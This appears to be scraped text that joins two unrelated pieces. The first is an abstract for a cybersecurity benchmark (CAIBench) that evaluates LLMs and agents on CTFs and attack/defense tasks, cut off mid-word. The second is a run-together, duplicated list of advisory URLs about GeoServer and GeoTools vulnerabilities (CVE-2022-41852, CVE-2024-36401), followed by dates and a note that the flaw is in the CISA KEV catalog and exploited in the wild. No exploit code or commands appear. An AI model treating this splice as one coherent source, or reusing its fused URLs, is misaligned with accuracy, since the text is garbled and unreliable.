Cybersecurity spans multiple interconnected domains, complicating the development of meaningful, labor-relevant benchmarks. Existing benchmarks assess isolated skills rather than integrated performance. We find that pre-trained knowledge of cybersecurity in LLMs does not imply attack and defense abilities, revealing a gap between knowledge and capability. To address this limitation, we present the Cybersecurity AI Benchmark (CAIBench), a modular meta-benchmark framework that allows evaluating LLM models and agents across offensive and defensive cybersecurity domains, taking a step towards meaningfully measuring their labor-relevance. CAIBench integrates five evaluation categories, covering over 10,000 instances: Jeopardy-style CTFs, Attack and Defense CTFs, Cyber Range e
https://github.com/Warxim/CVE-2022-41852?tab=readme-ov-file#workaround-for-cve-2022-41852https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvvhttps://github.com/geotools/geotools/pull/4797https://github.com/geotools/geotools/security/advisories/GHSA-w3pj-wh35-fq8whttps://osgeo-org.atlassian.net/browse/GEOT-7587https://github.com/Warxim/CVE-2022-41852?tab=readme-ov-file#workaround-for-cve-2022-41852https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvvhttps://github.com/geotools/geotools/pull/4797https://github.com/geotools/geotools/security/advisories/GHSA-w3pj-wh35-fq8whttps://osgeo-org.atlassian.net/browse/GEOT-7587https://www.vicarius.io/vsociety/posts/geoserver-rce-cve-2024-36401https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-36401
2024-07-01
Published
2024-07-15
Added to CISA KEV
Exploited in the wild